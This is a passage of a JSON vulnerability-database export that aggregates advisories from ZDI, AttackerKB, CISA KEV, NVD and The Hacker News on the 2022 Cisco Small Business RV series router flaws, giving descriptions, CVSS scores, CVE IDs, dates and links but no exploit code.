[Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T14:05:00", "type": "thn", "title": "Critical Flaws Discovered in Cisco Small Business RV Series Routers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699", "CVE-2022-20700", "CVE-2022-20701", "CVE-2022-20702", "CVE-2022-20703", "CVE-2022-20704", "CVE-2022-20705", "CVE-2022-20706", "CVE-2022-20707", "CVE-2022-20708", "CVE-2022-20709", "CVE-2022-20710", "CVE-2022-20711", "CVE-2022-20712", "CVE-2022-20749"], "modified": "2022-02-04T05:00:43", "id": "THN:DFFEC77385F3B4F85C43CE529B98C152", "href": "https://thehackernews.com/2022/02/critical-flaws-discovered-in-cisco.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2022-02-23T18:44:15", "description": "This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Cisco RV340 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of the update-clients method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "zdi", "title": "(Pwn2Own) Cisco RV340 update-clients Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20708"], "modified": "2022-02-22T00:00:00", "id": "ZDI-22-417", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-417/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-23T18:44:20", "description": "This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of firmware updates. The issue results from the lack of proper validation of a firmware image when performing an upgrade. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "zdi", "title": "(Pwn2Own) Cisco RV340 Firmware Update Missing Integrity Check Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20703"], "modified": "2022-02-22T00:00:00", "id": "ZDI-22-408", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-408/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T00:54:16", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Cisco RV340 routers. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within confd_cli. The issue results from executing user commands at an unnecessarily high privilege level. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "zdi", "title": "(Pwn2Own) Cisco RV340 confd_cli Unnecessary Privileges Local Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20701"], "modified": "2022-02-22T00:00:00", "id": "ZDI-22-412", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-412/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-23T18:44:17", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SSL VPN service, which listens on TCP port 8443 by default. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "zdi", "title": "(Pwn2Own) Cisco RV340 SSLVPN Stack-based Buffer Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2022-02-22T00:00:00", "id": "ZDI-22-414", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-414/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-23T18:44:17", "description": "This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Cisco RV340 routers. User interaction is required to exploit this vulnerability in that an administrator must perform a firmware update on the device. The specific flaw exists within the downloading of firmware files via HTTPS. The issue results from the lack of proper validation of the certificate presented by the server. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "zdi", "title": "(Pwn2Own) Cisco RV340 Firmware Update Improper Certificate Validation Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20703", "CVE-2022-20704"], "modified": "2022-02-22T00:00:00", "id": "ZDI-22-413", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-413/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-12-01T08:08:06", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T00:00:00", "type": "attackerkb", "title": "CVE-2022-20708", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20708"], "modified": "2022-02-10T00:00:00", "id": "AKB:A4434B3A-9194-4BD6-A1B1-77463B7E3875", "href": "https://attackerkb.com/topics/Dr7bj8jAsv/cve-2022-20708", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-19T17:14:35", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T00:00:00", "type": "attackerkb", "title": "CVE-2022-20703", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20703"], "modified": "2022-02-10T00:00:00", "id": "AKB:C141ACE4-A8F1-4772-B648-6B3AA5B46B43", "href": "https://attackerkb.com/topics/Sy2RG2Z20A/cve-2022-20703", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-05T08:13:44", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T00:00:00", "type": "attackerkb", "title": "CVE-2022-20701", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20701"], "modified": "2022-02-10T00:00:00", "id": "AKB:CE938B08-8EB0-4D1D-AA82-632EA9010ECF", "href": "https://attackerkb.com/topics/YlXn6VICn7/cve-2022-20701", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-21T05:13:54", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T00:00:00", "type": "attackerkb", "title": "CVE-2022-20700", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20700"], "modified": "2022-02-10T00:00:00", "id": "AKB:EF34D3A0-4FF6-4B40-9AAB-8759959DE40F", "href": "https://attackerkb.com/topics/LHUuFBwy51/cve-2022-20700", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-08T15:41:39", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \n**Yassineaboukir** at February 05, 2022 6:01pm UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T00:00:00", "type": "attackerkb", "title": "CVE-2022-20699", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2022-02-10T00:00:00", "id": "AKB:CBF7C2C4-17B9-46E9-ADE8-64190C6E9F7D", "href": "https://attackerkb.com/topics/KEaCoCGQkx/cve-2022-20699", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "A vulnerability in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code elevate privileges, execute arbitrary commands, bypass authentication and authorization protections, fetch and run unsigned software, or cause a denial of service (DoS).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-03T00:00:00", "type": "cisa_kev", "title": "Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20708"], "modified": "2022-03-03T00:00:00", "id": "CISA-KEV-CVE-2022-20708", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A vulnerability in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code elevate privileges, execute arbitrary commands, bypass authentication and authorization protections, fetch and run unsigned software, or cause a denial of service (DoS).", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-03T00:00:00", "type": "cisa_kev", "title": "Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20703"], "modified": "2022-03-03T00:00:00", "id": "CISA-KEV-CVE-2022-20703", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A vulnerability in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code elevate privileges, execute arbitrary commands, bypass authentication and authorization protections, fetch and run unsigned software, or cause a denial of service (DoS).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-03T00:00:00", "type": "cisa_kev", "title": "Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20701"], "modified": "2022-03-03T00:00:00", "id": "CISA-KEV-CVE-2022-20701", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A vulnerability in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code elevate privileges, execute arbitrary commands, bypass authentication and authorization protections, fetch and run unsigned software, or cause a denial of service (DoS).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-03T00:00:00", "type": "cisa_kev", "title": "Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20700"], "modified": "2022-03-03T00:00:00", "id": "CISA-KEV-CVE-2022-20700", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A vulnerability in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code elevate privileges, execute arbitrary commands, bypass authentication and authorization protections, fetch and run unsigned software, or cause a denial of service (DoS).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-03T00:00:00", "type": "cisa_kev", "title": "Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2022-03-03T00:00:00", "id": "CISA-KEV-CVE-2022-20699", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-02-09T14:04:52", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T18:15:00", "type": "cve", "title": "CVE-2022-20708", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 